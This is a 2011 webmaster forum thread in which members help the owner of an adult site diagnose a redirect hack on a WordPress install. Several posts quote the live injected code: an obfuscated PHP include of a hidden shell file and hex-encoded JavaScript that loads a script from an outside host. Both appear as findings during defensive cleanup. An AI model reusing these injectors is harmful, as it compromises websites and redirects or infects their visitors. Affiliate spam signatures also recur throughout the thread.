Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com
Redirection issue
Collapse
X
-
This is what I found:
Code:01:47:03.040 0.376 829 275 GET 302 Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4 http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg== 01:47:03.613 0.193 540 203 GET 302 Redirect to: http://www.cam4.com?act=200116~us-c http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4
-
If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:
teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Comment
-
went to your site via google search
after the page loaded I
got redirected here:
http://17.uso2.com/
edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
LOLLast edited by MikeFold; 12-14-2011, 12:07 PM.nothing to promoteComment
-
Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish
Also, is that last line of js after html tag supposed to be there?..
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Comment
-
It doesn't redirect for me anymore so I hope that fixed your problem
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Comment
-
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?
Code:<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>Comment
-
That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?
Code:<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
And change your passwords
Last edited by Colmike9; 12-14-2011, 01:22 PM.
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Comment
-
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>Comment
-
Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actually code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?
Code:<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>Comment
-
Thats the script under html that I was talking about, thought it was deleted.. My badSite is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
Last edited by Colmike9; 12-14-2011, 01:41 PM.
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Comment
-
Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.
I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.
To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.
And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.
When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.
Oh, and update your version of wordpress.
YOU Are Industry News!
Press Releases: pr[at]payoutmag.com
Facebook: Payout Magazine! Facebook: MIKEB!
ICQ: 248843947
Skype: Mediaguy1Comment
-
line 586 index.html
<!-- /wrapper -->
</body>
</html>
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>Comment
-
ok...tried it for you again (different box and browser)
it tried to hijack my browser.....i viewed source and this was still at the bottom
Code:<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>nothing to promoteComment
-
check the vision of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe relatedComment

Comment